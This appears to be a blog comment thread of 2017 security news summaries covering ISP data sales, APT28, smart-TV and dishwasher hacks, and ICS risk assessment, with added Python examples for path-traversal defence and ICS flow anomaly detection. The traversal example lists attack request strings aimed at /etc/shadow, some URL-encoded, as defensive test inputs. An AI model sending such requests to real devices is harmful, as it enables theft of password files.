    This follows the same vote in the Senate last week. Just prior to the vote, a White House spokesman said the president supported the bill, meaning that the decision will soon become law.

    This approval means that whoever you pay to provide you with internet access – Comcast, AT&T, Time Warner Cable, etc – will be able to sell everything they know about your use of the internet to third parties without requiring your approval and without even informing you.

    Your ISP already knows quite a lot about you: your name and address, quite possibly your age, and a host of other personally identifiable information such as your social security number. That’s on the customer information side. On the service side, they know which websites you visit, when, and how often.

    That information can be used to build a very detailed picture of who you are: what your political and sexual leanings are; whether you have kids; when you are at home; whether you have any medical conditions; and so on – a thousand different data points that, if they have sufficient value to companies willing to pay for them, will soon be traded without your knowledge.

    As one high-profile venture capitalist recently discovered, your previous search history can also impact what result you see in future.

    Impact

    It is difficult to underestimate the impact that the shift away from data privacy to open season on personal information sales may have. With cable companies now given strong financial incentive to draw on user information and habits, and with the stick of regulatory intervention effectively thrown away, it may result in significant societal changes.

    The irony is that just a few months ago the situation was the polar opposite.

    When US comms watchdog the FCC controversially declared that broadband providers were “common carriers” along the same lines as telephone companies, one of the many impacts was that it pulled enforcement of data privacy rules away from US trade watchdog the FTC and gave it to the FCC (which has very limited experience in consumer issues).

    What are we looking at in reality?

    So, setting aside hyperbole or extrapolation, what does this actually mean for end users? What can ISPs really see? And what can they really sell?

    Well, at the moment, it gives them the right to effectively sell ads like Facebook and Google. Both these companies build up a huge amount of information on individual users and then sell them. They sell the data in aggregate and keep a tight control on the fine details.

    ISPs now have this power too. Except they have one huge advantage: they don’t have to get you to log or opt into anything.

    your ISP sees everything you are doing because its service is your very internet connection. Even if you use the “incognito” mode that many browsers offer where you can’t be tracked by cookies, your ISP can still see where you are going because it has to go get the information from the websites you are looking at.

    Content

    Now, the really big question is: can your ISPs see the content of your online interactions? Can it read your emails? Can it read your search results? Can it store and search through the words you typed into a webpage?

    And the answer is: yes, sometimes.

    If the website you visit is not secured with HTTPS – meaning that any data between you and the website is encrypted – then your ISP can see exactly what you are doing.

    Now, this scary reality is tempered by two things: first, a majority of websites these days, especially big ones, use HTTPS. And second, it is a lot of hassle for ISPs to take this enormous quantity of information and make something valuable out of it.

    In short, it is not worth the cost of searching through your (and millions of others’) web traffic to find information that they can sell. What they make from that will not cover the costs of searching. But that may change with this Congressional vote: the economics may shift in favor of searching that traffic.

    It is a certainty that ISPs will run experiments to see if they can make money from digging into this information. Pharmaceutical companies in particular pay a lot of money for information on users looking for specific drugs

    So, the logical question is: what can you do about it?

    What can you do today, right now, on your computer to limit what other companies can do with your data?

    We have five general suggestions:

    1. Use Tor or a VPN
    2. Use a different search engine
    3. Log out and/or use two browsers at the same time
    4. Use HTTPS
    5. Call your ISP and ask them about opting out

    Reply
  12. Tomi Engdahl says:

    Kremlin-backed APT28 doesn’t even bother hiding its attacks, says Finnish secret police
    Supo: Espionage rising, attacks on infrastructure falling
    https://www.theregister.co.uk/2017/03/30/kremlinbacked_apt28_doesnt_hide_its_attacks/

    The Finnish Security Intelligence Service Supo is complaining that nation-state-level attackers aren’t even bothering to hide themselves from prying eyes.

    That news comes in the agency’s review of intelligence activity in 2016, announced here.

    The major trends in cyber-intelligence Supo highlights in the report are increasing attacks against Finland’s foreign and security infrastructure, espionage attempts, and actors abusing Finnish data networks “in espionage targeting third countries.”

    On the other hand, attacks against critical infrastructure fell sharply in 2016.

    Regarding attempts to compromise the country’s “foreign and security policy,” the report notes: “Most observations were related to an APT28/Sofacy attack in which no particular effort was made to conceal the activity … It is justified to assume that also the number of cases which have not come to the authorities’ knowledge has increased.”

    APT28 has been blamed for attacks on Georgia, Eastern Europe, NATO, the Organization for Security and Co-operation in Europe, and in 2014, FireEye went public linking the group to the Kremlin.

    Other tags hung on the group are Sofacy, Pawn Storm and Fancy Bear.

    http://www.supo.fi/tiedotteet/1/0/supon_vuosikirja_2016_on_julkaistu_72854

    Reply
  13. Tomi Engdahl says:

    About 90% of Smart TVs Vulnerable To Remote Hacking Via Rogue TV Signals
    https://entertainment.slashdot.org/story/17/03/29/2018240/about-90-of-smart-tvs-vulnerable-to-remote-hacking-via-rogue-tv-signals

    A new attack on smart TVs allows a malicious actor to take over devices using rogue DVB-T (Digital Video Broadcasting — Terrestrial) signals, get root access on the smart TV, and use the device for all sorts of nasty actions, ranging from DDoS attacks to spying on end users. The attack, developed by Rafael Scheel, a security researcher working for Swiss cyber security consulting company Oneconsult, is unique and much more dangerous than previous smart TV hacks. Scheel’s method, which he recently presented at a security conference, is different because the attacker can execute it from a remote location, without user interaction, and runs in the TV’s background processes, meaning users won’t notice when an attacker compromises their TVs.

    About 90% of Smart TVs Vulnerable to Remote Hacking via Rogue TV Signals
    https://www.bleepingcomputer.com/news/security/about-90-percent-of-smart-tvs-vulnerable-to-remote-hacking-via-rogue-tv-signals/

    Current smart TV hacks aren’t really “dangerous”

    Until now, all smart TV exploits relied on attackers having physical access to the device, in order to plug in a USB that executes malicious code. Other attacks relied on social engineering, meaning attackers had to trick users into installing a malicious app on their TV.

    Even the mighty CIA developed a hacking tool named “Weeping Angel,” which could take over Samsung smart TVs and turn them into spying devices. But despite its considerable human and financial resources, the CIA and its operators needed physical access to install Weeping Angel, which made it less likely to be used in mass attacks, and was only feasible if deployed on one target at a time, during carefully-planned operations.

    Because of the many constraints that come with physical and social engineering attacks, Scheel didn’t consider any of them as truly dangerous, and decided to create his own.

    Scheel’s attack is remote, no user interaction needed

    Furthermore, Scheel says that “about 90% of the TVs sold in the last years are potential victims of similar attacks,” highlighting a major flaw in the infrastructure surrounding smart TVs all over the globe.

    At the center of Scheel’s attack is Hybrid Broadcast Broadband TV (HbbTV), an industry standard supported by most cable providers and smart TV makers that “harmonizes” classic broadcast, IPTV, and broadband delivery systems. TV transmission signal technologies like DVB-T, DVB-C, or IPTV all support HbbTV.

    Scheel says that anyone can set up a custom DVB-T transmitter with equipment priced between $50-$150, and start broadcasting a DVB-T signal.

    Rogue TV signals could deliver malicious HbbTV commands

    Scheel developed two exploits he hosted on his own website, which when loaded in the TV’s built-in browser would execute malicious code, gain root access, and effectively take over the device.

    For his first exploit, Scheel used CVE-2015-3090, which is one of the Flash zero-days leaked in the Hacking Team 2015 incident. After coding and successfully testing the exploit, Scheel realized that not all smart TV browsers come with the Flash Player plugin enabled by default.

    Because of this, Scheel developed a second exploit, which exploited an older vulnerability in the Array.prototype.sort() JavaScript function, supported by all browsers, even by those shipped with smart TVs.

    Reply
  14. Tomi Engdahl says:

    DJI Proposes New Electronic ‘License Plate’ For Drones
    https://tech.slashdot.org/story/17/03/28/213236/dji-proposes-new-electronic-license-plate-for-drones

    Chinese drone maker DJI proposed that drones be required to transmit a unique identifier to assist law enforcement to identify operators where necessary. Anyone with an appropriate receiver could receive the ID number, but the database linking the ID with the registered owner would only be available to government agencies. DJI likens this to a license plate on a car and offers it as a solution to a congressional mandate that the FAA develop methods to remotely identify drone operators.

    Reply
  15. Tomi Engdahl says:

    Every second, 44 data records are stolen

    The data security company Gemalto has drawn up a report on last year’s data thefts. The amount of information that has been compromised is dramatic: 44 data records are stolen every second, Gemalto’s statistics say.

    Last year, hackers took a total of 1.4 billion data entries from large databases. There were 1,792 database breaches. 86 percent more information fell into the wrong hands than in the previous year.

    59 per cent of the misappropriated data was so-called identity theft. What is worrying is the fact that in more than half of the data thefts it was not initially clear how much data had fallen into the attackers’ hands.

    According to Gemalto’s Breach Level Index (BLI), over 7 billion data records have fallen into the wrong hands since 2013. This means about 3 million every day, about 2,623 every minute and about 44 every single second.

    Source: http://www.etn.fi/index.php/13-news/6084-joka-sekunti-varastetaan-44-tietoa

    More:
    http://breachlevelindex.com/assets/Breach-Level-Index-Infographic-2016-Gemalto-1500.jpg?utm_source=press-release&utm_medium=infographic&utm_term=bli&utm_content=bli-infographic&utm_campaign=bli-2016-full-report

    Reply
  16. Tomi Engdahl says:

    Russian Hackers Domain Fronting
    http://hackaday.com/2017/03/28/russian-hackers-domain-fronting/

    FireEye just put out a report on catching the Russian hacker group “Advanced Persistent Threat 29” (APT29, for lack of a better code name) using the meek plugin for TOR to hide their traffic. If you’re using meek with meek-reflect.appspot.com, you’ll find it’s been shut down. If all of this is gibberish to you, read on for a breakdown.

    https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html

    Reply
  17. Tomi Engdahl says:

    2017: The Year of the Dishwasher Security Patch
    http://hackaday.com/2017/03/28/2017-the-year-of-the-dishwasher-security-patch/

    As if Windows Update wasn’t bad enough, one has to deal with a plethora of attention-hungry programs and utilities all begging for a continual stream of patches from the Internet. It’s exhausting, but unfortunately also par for the course. Many of these updates are to close security vulnerabilities that could otherwise expose your computer to undesirables. The Internet of Things will only expand the amount of hardware and software you need to keep updated and protected on a daily basis. Now, it’s your dishwasher that’s under attack.

    The Register reports that Jens Regel discovered the bug in a Miele dishwasher with a webserver. It’s a basic directory traversal attack that can net the intruder the shadow password file. Armed with this, it’s simple to take over the embedded Linux system and wreak havoc on your local network.

    Dishwasher has directory traversal bug
    Thanks a Miele-on for making everything dangerous, Internet of Things firmware slackers
    https://www.theregister.co.uk/2017/03/26/miele_joins_internetofst_hall_of_shame/

    Reply
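    The directory traversal the Register describes, as an added example that is not Miele’s firmware or the article’s code: the naive path join beside a resolver that confines every request to the web root. The web root and request paths are constructed for illustration.

```python
"""Directory traversal: the naive path join beside a confined resolver.

Added example, not Miele's firmware or the Register's code. The web root,
request paths and file names are constructed for illustration.
"""
import os
from urllib.parse import unquote

# Constructed web root of the embedded HTTP server.
WEB_ROOT = "/srv/dishwasher-www"


def serve_path_naive(web_root, request_path):
    """The classic mistake: decode the URL path and join it onto the root.
    A request for /../../etc/shadow normalises straight out of the root."""
    return os.path.normpath(web_root + "/" + unquote(request_path))


def resolve_safe_path(web_root, request_path):
    """Map request_path to a file under web_root, or return None if the
    request tries to leave it. None is the signal to answer 403 and log."""
    decoded = unquote(request_path)
    if "%" in decoded:                 # double-encoded, e.g. %252e%252e
        decoded = unquote(decoded)
    if "\x00" in decoded:              # NUL truncation tricks
        return None
    # Backslashes are ordinary characters on the Linux target, but normalise
    # them so they cannot hide a ".." segment from the check below.
    decoded = decoded.replace("\\", "/")
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if any(s == ".." for s in segments):
        return None
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, *segments))
    # Defence in depth: after symlink resolution the file must still be
    # under the root, otherwise a planted symlink could re-open the hole.
    if candidate != root and not candidate.startswith(root + os.sep):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed request paths as they might appear in the server's access log.
    for req in ("/status.html", "/../../etc/shadow", "/%2e%2e/%2e%2e/etc/shadow",
                "/%252e%252e/%252e%252e/etc/shadow", "/..\\..\\etc\\shadow"):
        safe = resolve_safe_path(WEB_ROOT, req)
        print(f"{req:40} naive={serve_path_naive(WEB_ROOT, req):35} "
              f"safe={'blocked' if safe is None else safe}")
```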
  18. Tomi Engdahl says:

    Current issues in industrial cybersecurity
    Ransomware is as loathsome as it sounds; programmable logic controllers (PLCs) seen as likely targets.
    http://www.controleng.com/single-article/current-issues-in-industrial-cybersecurity/0b6e85d1bc4470214766f201aa816d5c.html

    A meteoric rise in ransomware attacks in the past year is disturbing news for engineers in manufacturing and production environments. Ransomware, as you might imagine, is a kind of malicious software used by criminals to prevent access to a computing system until their demands are met.

    Executing a ransomware attack doesn’t take programming skills per se, as kits for committing such attacks are readily available today in some of the Internet’s darker corners, either for free or for a small fee.

    Reply
  19. Tomi Engdahl says:

    Mobile safety strategy: Six things to consider
    Combine smart devices with flexible technology to provide real-time alerts.
    http://www.controleng.com/single-article/mobile-safety-strategy-six-things-to-consider/c2a5cde4a24aca86c22f945ef0a326c8.html

    Organizations go through significant evolutions in many areas of their businesses. The technical challenges in managing risks around workplace safety are similar in many respects to other parts of the enterprise: there is software to minimize the hurdles that impede getting information from a source into a system which in turn enables the right people to make informed, proactive and actionable decisions.

    Archaic environmental health and safety (EHS) programs rely on employees to collect data manually, transpose the information into spreadsheets or disparate, disconnected software products-or worse yet, paper binders-and perpetually repeat this process. Such programs may suffice in meeting minimum regulatory standards, but they typically fall short due to human error and the sheer quantity of information involved. Absent adequate software, actionable intelligence is not available to inform proactive decision-making and preventive actions.

    Mobile devices integrated with EHS tools to leverage real-time connectivity, native apps, and easy in-the-field data entry, are game changing.

    Reply
  20. Tomi Engdahl says:

    Safety requires cybersecurity
    http://www.controleng.com/single-article/safety-requires-cybersecurity/1dc4479aa9b2e5886ab582698c5a419a.html

    Technology Update: If it isn’t secure, it isn’t safe. Cybersecurity vulnerabilities represent additional failure modes and safety incidents not factored into traditional safety assessments. Consider safety when creating a business justification for cybersecurity risk assessments.

    Functional safety assessments are a well-established practice in machine and process automation. These assessments focus on random hardware failures or systematic software failures (such as bugs).

    However, cybersecurity threats and vulnerabilities represent additional failure modes that may lead to incidents that are unaccounted for in traditional safety assessments. A business justification can be developed for discussing cyber risk assessments.

    The majority of factories and process plants today are controlled and operated by automation systems built on Ethernet TCP/IP networks and legacy Microsoft operating systems. These systems are vulnerable to cybersecurity breaches resulting in potentially significant risks, including risks to health, safety and the environment. To address the risk, there’s a need to understand it—but how? Functional safety assessments focus on random hardware failures or systematic software failures (such as bugs) and generally do not consider cyber threats or cyber vulnerabilities. To understand cyber risk, it’s necessary to perform cyber vulnerability assessments and cyber risk assessments. Not surprisingly, this is exactly what cybersecurity standards and regulations require.

    ICS cybersecurity vulnerability assessment

    Figure 2: A cybersecurity vulnerability assessment also requires partitioning the system into zones and conduits. Courtesy: aeSolutions

    Vulnerabilities are a key variable in cyber risk. In theory, if there are no cyber vulnerabilities there is no cyber risk. Of course, in reality all ICSs have vulnerabilities, some more than others. The number and severity of vulnerabilities depends on the components used, how they are configured and how they are networked.

    So what is an ICS cybersecurity vulnerability assessment? It is an evaluation of an ICS design. In a brownfield design, begin with the ICS as-built or as-found drawings. An example is shown in Figure 1.

    How is that control system constructed? What devices make up the system? How are they networked together? How do those networks communicate? Modern control systems are based on Ethernet networking and Microsoft operating systems. Understanding how these pieces go together can be very difficult in many facilities. Drawings that show the entire system architecture may not exist; these systems often have grown and evolved over decades.

    Start with an analysis of network communications to understand how these networks are constructed and how data moves throughout the system. This is done by recording actual network traffic and plotting it out to see the data flows.

    Identify what devices are communicating with each other. What devices should be communicating with each other? What devices are communicating with each other that perhaps should not be, or were not expected to be? Are any devices communicating using unexpected protocols? Are there control system devices that are trying to communicate to the Internet? Plot the communications and look for anomalous behaviors.

    A vulnerability assessment would then analyze the actual servers and workstations that make up the system. Most of the operating systems that are controlling the bulk of industrial facilities today are legacy Microsoft platforms such as XP and Windows Server 2003.

    The next step in a vulnerability assessment would be to partition the system into zones and conduits.

    A vulnerability assessment also should include a review of policies and procedures, and include a gap analysis. How does the system stack up against industry standards and best practices? Finally, the assessment should list the vulnerabilities that have been discovered and the recommended mitigations to close the gaps.

    Reply
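    The network-communication step of the assessment above, as an added example that is not code from the Control Engineering article or from aeSolutions: constructed flow records from a control network are aggregated into a device-to-device communication matrix and checked against an expected-communication model, flagging unexpected peers, unexpected protocols and control-system devices reaching the Internet. The device inventory, roles, allow-list and address ranges are all assumptions made for the example.

```python
"""Flow analysis step of an ICS vulnerability assessment.

Added example, not code from the Control Engineering article or aeSolutions.
It takes constructed flow records (as one would export from a capture of the
control network), builds the device-to-device communication matrix, and flags
the three things the assessment asks about: unexpected peers, unexpected
protocols, and control-system devices talking to the Internet.
"""
import ipaddress
from collections import defaultdict

# Constructed inventory: address -> role. Anything not listed is "unknown".
DEVICE_ROLES = {
    "10.10.1.10": "hmi",
    "10.10.1.11": "historian",
    "10.10.2.20": "plc",
    "10.10.2.21": "plc",
    "10.10.3.30": "eng-ws",
}

# Constructed allow-list of expected conversations between roles:
# (initiator role, responder role) -> set of (proto, destination port).
EXPECTED = {
    ("hmi", "plc"): {("tcp", 502)},                       # Modbus/TCP polling
    ("eng-ws", "plc"): {("tcp", 502), ("tcp", 44818)},    # Modbus + EtherNet/IP
    ("hmi", "historian"): {("tcp", 1433)},                # MSSQL historian
    ("eng-ws", "historian"): {("tcp", 1433)},
}

# Assumption: the control network is 10.10.0.0/16 and must never reach
# anything outside the RFC 1918 ranges.
CONTROL_NET = ipaddress.ip_network("10.10.0.0/16")
PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed flow records: (src, dst, proto, dst_port, bytes).
SAMPLE_FLOWS = [
    ("10.10.1.10", "10.10.2.20", "tcp", 502, 120_000),
    ("10.10.1.10", "10.10.2.21", "tcp", 502, 118_500),
    ("10.10.3.30", "10.10.2.20", "tcp", 44818, 9_000),
    ("10.10.1.10", "10.10.1.11", "tcp", 1433, 400_000),
    ("10.10.2.21", "10.10.3.30", "tcp", 445, 20_000),     # PLC opening SMB to a workstation
    ("10.10.2.20", "203.0.113.8", "tcp", 443, 3_200),      # PLC reaching out to the Internet
    ("10.10.3.30", "10.10.2.21", "udp", 161, 800),         # SNMP, not in the allow-list
    ("10.10.9.99", "10.10.2.20", "tcp", 502, 5_000),       # unlisted device polling a PLC
]


def is_internet(ip):
    """True when the address is outside every RFC 1918 range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in PRIVATE_NETS)


def communication_matrix(flows):
    """Aggregate flows into (src role, dst role) -> {(proto, port): bytes}.
    This is the tabular form of 'plotting the data flows'."""
    matrix = defaultdict(lambda: defaultdict(int))
    for src, dst, proto, port, nbytes in flows:
        pair = (DEVICE_ROLES.get(src, f"unknown:{src}"),
                DEVICE_ROLES.get(dst, f"unknown:{dst}"))
        matrix[pair][(proto, port)] += nbytes
    return {pair: dict(services) for pair, services in matrix.items()}


def find_anomalies(flows):
    """Return (src, dst, proto, port, reason) for every flow that the
    expected-communication model does not explain."""
    findings = []
    for src, dst, proto, port, _ in flows:
        if ipaddress.ip_address(src) in CONTROL_NET and is_internet(dst):
            findings.append((src, dst, proto, port, "internet-bound"))
            continue
        src_role, dst_role = DEVICE_ROLES.get(src), DEVICE_ROLES.get(dst)
        if src_role is None or dst_role is None:
            findings.append((src, dst, proto, port, "unknown-device"))
            continue
        allowed = EXPECTED.get((src_role, dst_role))
        if allowed is None:
            findings.append((src, dst, proto, port, "unexpected-conversation"))
        elif (proto, port) not in allowed:
            findings.append((src, dst, proto, port, "unexpected-protocol"))
    return findings


if __name__ == "__main__":
    for pair, services in sorted(communication_matrix(SAMPLE_FLOWS).items()):
        print(pair, services)
    for finding in find_anomalies(SAMPLE_FLOWS):
        print("FLAG", finding)
```

    Each flagged flow is a question for the plant engineers rather than a verdict: the allow-list is only as good as the as-found drawings it was built from, so the matrix and the findings should be reviewed together.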
  21. Tomi Engdahl says:

    Beware—the Microwave May be Listening!
    http://mwrf.com/blog/beware-microwave-may-be-listening?NL=MWRF-001&Issue=MWRF-001_20170330_MWRF-001_570&sfvc4enews=42&cl=article_1_b&utm_rid=CPG05000002750211&utm_campaign=10389&utm_medium=email&elq2=738388b652d9471793168c138ea2cb79

    Surveillance has played a prominent role in successful military campaigns, but less so in political campaigns—although members of the current U.S. administration may beg to differ. News reports of wiretapped phone lines and microwave ovens used as listening devices suggest an uncomfortable level of paranoia in the executive branch, not to mention a disquieting disconnect from the realities of modern RF/wireless technologies.

    Microwave ovens probably represent the first encounter with microwave technology for most people.

    Performing surveillance requires some kind of tracking or listening device, like a wireless microphone hidden in a room. Or, if left unattended and unnoticed, the microphone embedded in a laptop computer could provide similar engress. Using popular wireless technologies such as Bluetooth or Wi-Fi, either example could be used for simple audio surveillance, transmitting a digital version of the “wiretapped” conversation to an unseen listener.

    Could a microwave oven operate as a surveillance device? Possibly…if it’s properly equipped. As mentioned above, a microwave oven operates at 2.45 GHz—coincidentally, in the same unlicensed Industrial, Scientific, and Medical (ISM) frequency range as Bluetooth and Wi-Fi. But it is not modulated for communications purposes.

    A microwave oven could potentially operate as a transmitter, if modulated and if connected to an antenna.

    Certainly, a microwave oven could be designed for surveillance (as well as for cooking).

    Reply
  22. Tomi Engdahl says:

    UW professor: The information war is real, and we’re losing it
    http://www.seattletimes.com/seattle-news/politics/uw-professor-the-information-war-is-real-and-were-losing-it/

    A University of Washington professor started studying social networks to help people respond to disasters. But she got dragged down a rabbit hole of Twitter-boosted conspiracy theories, and ended up mapping our political moment.

    Starbird argues in a new paper, set to be presented at a computational social-science conference in May, that these “strange clusters” of wild conspiracy talk, when mapped, point to an emerging alternative media ecosystem on the web of surprising power and reach.

    Reply
  23. Tomi Engdahl says:

    Someone is putting lots of work into hacking Github developers
    Dimnie recon trojan has flown under the radar for three years… until now.
    https://arstechnica.com/security/2017/03/someone-is-putting-lots-of-work-into-hacking-github-developers/

    Reply
  24. Tomi Engdahl says:

    Europe’s justice ministers unsure on whether to push for decrypt law
    https://techcrunch.com/2017/03/29/europes-justice-ministers-unsure-on-whether-to-push-for-decrypt-law/?ncid=rss&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&utm_content=FaceBook&sr_share=facebook

    European justice and home affairs ministers are putting their heads together to try to decide on a collective response to Internet companies’ use of strong encryption.

    And, ultimately, whether to push for legislation requiring backdoors in end-to-end encryption to afford the region’s law enforcement agencies access to user data on-demand.

    Last summer home affairs ministers from France and Germany called for a law to enable courts to demand Internet companies decrypt data on request.

    Their call was repeated earlier this week by UK Home Secretary, Amber Rudd, who said intelligence services must be able to access readable data from apps such as end-to-end encrypted WhatsApp, asserting: “There should be no place for terrorists to hide.”

    As is typically the case when politicians denounce technology companies’ use of encryption, Rudd was speaking in the wake of a terror attack.

    Encryption technology has been the scapegoat of choice for Western politicians responding to terrorist attacks for multiple years now, despite governments also operating vast, dragnet digital surveillance programs.

    Yesterday EU Justice Commissioner Vera Jourova also touched on the topic of encrypted apps.

    A Euractiv report of her comments suggests the EC has already made up its mind to put forward measures this summer — aimed at forcing what she described as a “swift, reliable response” from encrypted apps when asked to hand over decrypted data.

    However a Commission spokeswoman told TechCrunch that no decisions have been made about how to approach encryption at this stage, adding that discussions are not yet “very advanced”.

    On encryption the discussions are still ongoing. And for now there’s no legislative plan.

    But the question of whether EU lawmakers intend to push to require Internet companies such as WhatsApp to effectively backdoor their end-to-end encryption remains an open-ended one.

    “Yesterday all the ministers agreed that this is an issue and that criminal justice in cyberspace is being challenged by this

    Indeed, the UK has already legislated to be able to demand decryption on request and block use of e2e encryption in the Investigatory Powers Act.

    But the issue is very, very complex in the sense that matters of national security are also Member State competence so there’s no competence at the EU level.

    The EU’s anti-terrorism coordinator, Gilles de Kerchove, previously discussed this notion of balance, telling Euractiv: “We need a very strong internet — we don’t want to create vulnerabilities”

    “The question is, can you open a backdoor for Europol only, or would that at the same time create a vulnerability and open a backdoor for the Russian mafia or third party state spies? This is part of the discussion but we are not there yet. There is internal work — it’s a tricky issue,” de Kerchove added.

    Reply
  25. Tomi Engdahl says:

    How to Improve Your Chances of Staying Out of the Insider Threat Headlines
    http://www.securityweek.com/how-improve-your-chances-staying-out-insider-threat-headlines

    Insider Threats Are a Fact of Life and Are Not Going Away.

    The continuous headlines of data breaches and leaks caused by insiders, in both the private and public sectors, start to feel like a broken record. Combatting insider threats is one of the greatest cyber challenges facing organizations today. They are stuck between a rock and a hard place, needing to give people access to valued information and systems to do business but also making the organization vulnerable to a potential compromise if any one of those people missteps. Access implies an inherent level of trust between employer and employee, or client and vendor. The written or unwritten contract between the parties is that access is being provided for the individuals to do their jobs, and they in turn will not use it for anything outside those boundaries.

    A few questions regarding this setup present themselves right off the bat. Does the insider understand their responsibilities when it comes to protecting the information and systems they are accessing? Do they understand what is required to live up to those responsibilities? Are they provided with the tools to execute their jobs while still living up to those responsibilities? Are they working in a protected environment, like an office, or in an exposed environment, like at a coffee shop? What is the inherent risk of the person being provided access? Are they committed to the company? Do they have any personal characteristics that would drive them to compromise the company?

    There are also ongoing operational challenges such as making sure that everybody only has the level of access required to do their jobs, and that privileged access is limited and monitored. Finally, how do you detect an insider threat and stop them before they do damage?

    Unfortunately, it takes time and effort to minimize exposure to insider threats.

    Reply
  26. Tomi Engdahl says:

    Audit Finds Over a Dozen NTP Vulnerabilities
    http://www.securityweek.com/audit-finds-over-dozen-ntp-vulnerabilities

    Researchers at Germany-based security firm Cure53 have conducted a 32-day audit of the Network Time Protocol (NTP) and the NTPsec project and discovered more than a dozen vulnerabilities.

    Cure53 has published separate reports focusing on the NTP and NTPsec problems.

    The Network Time Foundation addressed the flaws earlier this month with the release of ntp-4.2.8p10.

    Cure53 has classified one vulnerability as being critical. CVE-2017-6460, which only affects NTP, has been described as a stack-based buffer overflow that can be triggered by a malicious server when a client requests the restriction list. The flaw can be exploited to cause a crash and possibly to execute arbitrary code.

    The security holes rated by Cure53 as high severity are CVE-2017-6463 and CVE-2017-6464, both of which can be exploited for DoS attacks.

    Ntp-4.2.8p10 patches a total of 15 vulnerabilities and also includes just as many non-security fixes and improvements.

    Reply
  27. Tomi Engdahl says:

    As Malware Gets Smarter, Bare Metal Analysis Can Keep You Secure
    http://www.securityweek.com/malware-gets-smarter-bare-metal-analysis-can-keep-you-secure

    They say a rising tide lifts all boats; unfortunately, the proverb applies to cybercriminals, too. While the inexpensive availability of compute processing power and broadband connectivity has made technologies like virtualization and cloud computing possible, that same ready access makes it possible for even a novice cybercriminal to leverage some of the most advanced malware available today.

    All it takes is a laptop, a Bitcoin account, and a willingness to break the law; and anyone can purchase, rent or even download – for free – advanced malware that, even as of a few months ago, wasn’t available. And if the aspiring criminal doesn’t have the ability to use the malware to conduct the attack himself or herself, that person can simply hire the services of a hacker-for-hire.

    This is particularly disturbing in light of the fact that advanced malware can increasingly avoid detection by threat intelligence researchers and malware analysis tools.

    Reply
  28. Tomi Engdahl says:

    Millions of Websites Affected by IIS 6.0 Zero-Day
    http://www.securityweek.com/millions-websites-affected-iis-60-zero-day

    More than 8 million websites could be exposed to a buffer overflow vulnerability in Internet Information Services (IIS) 6.0 that has been exploited in the wild since July 2016, researchers warn.

    The bug was found in the ScStoragePathFromUrl function of the Web Distributed Authoring and Versioning (WebDAV) service in Windows Server 2003 R2’s IIS 6.0. The issue, tracked as CVE-2017-7269, resides in the improper validation of an ‘IF’ header in a PROPFIND request and could allow an attacker to cause denial of service or to run arbitrary code.

    Reply
  29. Tomi Engdahl says:

    New Mirai Variant Unleashes 54-Hour DDoS Attack
    http://www.securityweek.com/new-mirai-variant-unleashes-54-hour-ddos-attack

    New Variant of Infamous IoT Botnet Launches Attack Against Network of U.S. College

    A newly discovered variant of the Mirai botnet was responsible for powering a 54-hour distributed denial of service (DDoS) attack, Imperva researchers reveal.

    Mirai was one of the most discussed Internet of Things (IoT) botnets during the second half of last year, after it was used in two large attacks against Brian Krebs’ blog and DNS provider Dyn. In October, the Trojan’s source code leaked online and new variants emerged soon after.

    One such version emerged in December when TalkTalk Telecom home routers were being infected via a vulnerability in the network router protocol. Earlier this year, researchers observed a Windows variant of Mirai, though concluded that it was mainly designed to spread the Linux Trojan to more IoT devices.

    On Feb. 28, the new Mirai threat was used to launch a DDoS attack against a US college, and researchers say that the assault continued for 54 hours straight. The average traffic was of over 30,000 requests per second (RPS) and peaked at around 37,000 RPS, the highest of any Mirai botnet (the attack generated a total of over 2.8 billion requests).

    Reply
  30. Tomi Engdahl says:

    The Power and Importance of Peer Review
    http://www.securityweek.com/power-and-importance-peer-review

    As a Security Professional, If You’re Not Having Your Work Peer Reviewed You’re Not Doing it Right.

    Earlier in my career I bought into the notion that the ultimate goal of one’s career was to be the smartest person in the room. That being the smartest, or at least having people believe you were the smartest, was the pinnacle of it all. I’m happy to admit that I’ve since learned better. There are many bad things about thinking that way – you alienate peers by design, you fear discourse and analysis of your ideas, and you always have to keep playing the provocateur. Frankly it’s miserable and exhausting.

    This is the reason that I’ve focused the last few years of my career on building a group that researches, channels and organizes knowledge for the betterment of the collective. There is a lot of amazing tribal knowledge out there – lots of very smart people with something to share but without a voice. Aggregating these ideas, forcing them to compete with each other in a positive way and fostering collaboration is an amazing job. Those who have worked with me recently will recall me saying how important it is to stay humble and to seek out those with brilliant minds to aggregate all that available knowledge and feed it back. The aggregate is truly much more powerful than its piece parts.

    I’m not trying to be your Yoda, but I’m sure you can look around and recognize how far out of the mainstream ideas like peer review have fallen. Egos are king and everyone is an expert. Just ask them.

    Reply
  31. Tomi Engdahl says:

    This Stealthy Malware Remained Unnoticed for Three Years
    http://www.securityweek.com/stealthy-dimnie-malware-remained-unnoticed-three-years

    Stealthy command and control methods allowed a newly discovered malware family to fly under the radar for more than three years, Palo Alto Networks security researchers reveal.

    Dubbed Dimnie, the threat was discovered in mid-January 2017, when it was targeting open-source developers via phishing emails. An attached malicious .doc file contained embedded macro code that executed a PowerShell command to download and execute a file.

    The first samples pertaining to this malware family dated back to early 2014, but the use of stealthy command and control (C&C) methods, combined with a Russian-focused target base helped the threat remain unnoticed until this year. Dimnie, which attempted a global reach with its January 2017 campaign, is capable of downloading additional malware and stealing information from compromised systems.

    Reply
  32. Tomi Engdahl says:

    Security vs. Quality: What’s the Difference?
    http://www.securityweek.com/security-vs-quality-what%E2%80%99s-difference

    Quality and security. Two words that share an interesting relationship and no small amount of confusion.

    What is certain is that both words are meaningful in the context of software. Quality essentially means that the software will execute according to its design and purpose. Security means that the software will not put data or computing systems at risk of unauthorized access. While quality seems to be easier to measure, both are somewhat subjective in their assessment.

    The real confusion comes when you consider the relationship between quality and security. Are they the same thing or is one a subset of the other? If I have quality, does that mean I’m also secure? Are quality problems also security problems or vice versa?

    Defining quality and security defects

    For those who take a holistic view of software design and development, quality and security issues both fall into the broad category of defects.

    Applying the definition of “defect”, the software malfunctioned or failed in its purpose. This would be a defect and would fall into the category of quality.

